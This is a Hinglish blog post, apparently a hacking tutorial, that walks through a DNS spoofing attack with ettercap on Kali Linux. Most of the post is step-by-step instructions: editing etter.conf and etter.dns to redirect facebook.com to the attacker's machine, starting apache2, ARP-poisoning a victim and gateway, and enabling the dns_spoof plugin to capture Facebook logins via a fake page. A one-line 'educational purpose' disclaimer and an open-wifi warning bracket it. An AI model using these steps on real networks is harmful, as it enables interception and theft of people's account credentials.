Dosto is post par mai apko DNS Spoofing ke bare mai btaunga
DNS Spoofing attack karne ke liye apko or apke victim ka same network mai hona jaruri hai. sabse pahle apko DNS ke bare mai jana bahut jaruri hai DNS (Domain name system) kisi bhi website ka apna ek unique IP address hota hai hum humans ke liye har ek website ka ip address yaad rakhna bahut mushkil hai par hume names yaad rehte hai jaise Facebook.com , Gmail.com etc isliye DNS bnaya gaya hai DNS ek networking ka topic hai iske bare mai detail mai aapko networking mai btaunga. yeh post educational purpose ke liye hai aap iska missuse mat kare.
DNS Spoofing attack mai hacker apne victim ke computer ke traffic ko apne computer par divert kar leta hai. DNS Spoofing attack mai hacker victim ke Address resolution protocol(ARP) mai poision inject kar deta hai . is attack ko detect karna bahut mushkil hai firewall or antivirus is attack ko detect nahi kar sakte. jaise victim jab Facebook ko open karega to orignal Facebook open hone ki jagah victim ka bnaya hua fake page open ho jayga jiski vjh se Facebook account hack ho jata hai aapko commands bata raha hu .

- Open kali linux terminal
- Type ( leafpad /etc/ettercap/etter.conf)
- File open hone ke bad last mai linux likha hoga uske niche
- # if you use ip tables likha hoga
- #redir_command_on or #redir_command_of likha hoga aapko (#) hash ko hatana hoga dono lines ke age se then save
- Type service apache2 start
- Type ( leafpad /etc/ettercap/etter.dns)
- file open hone ke bad # redirect it to www.linux.org likha hoga uske niche
- microsoft.com A 170.170.40.56 or *.microsoft.com A 170.170.40.56 likha hoga aapko ise change karna hoga
- facebook.com A computer ip address like (192.168.1.111) or *.facebook.com A computer ip address like (192.168.1.111) then save
- Type ettercap -G
- tool open hone ke bad menu bar mai sniff par click then click unified sniffing then select your network interface like eth0 , wlan0 then sniffing start ho jayegi automatic par apko stop karna hoga then
- menu bar mai target par click karna phir target sets par click karna then click hosts then scan for hosts network mai jitne computers connect hoge sabke ip address a jayenge
- go to hosts then click host lists apko ip address show ho jayenge gateway ke ip address ko target 2 par add karna (192.168.1.1) victim ke ip address ko target 1 par add karna (192.168.1.110)
- menu bar mai mitm par click karke arp poisoning par click kare click sinff remote connections then ok
- menu bar mai plugins par click karke dns spoof par click karke activate karna hoga
- setup complete ab aap start par jakr start sniffing par click karna
ab jab victim facebook.com open karega to fake page open hoga or victim ka username or password hacker ke pass a jayga ise bachne ke liye aap kabhi open wifi use mat kare .
mai ummeed karta hu ki aap sabko DNS Spoofing attack ke bare puri mai jaankari mil gayi hogi agar apko post pasand aye to share kare dhanywad .
Visit karne ke liye apka shukriya
No comments:
Post a Comment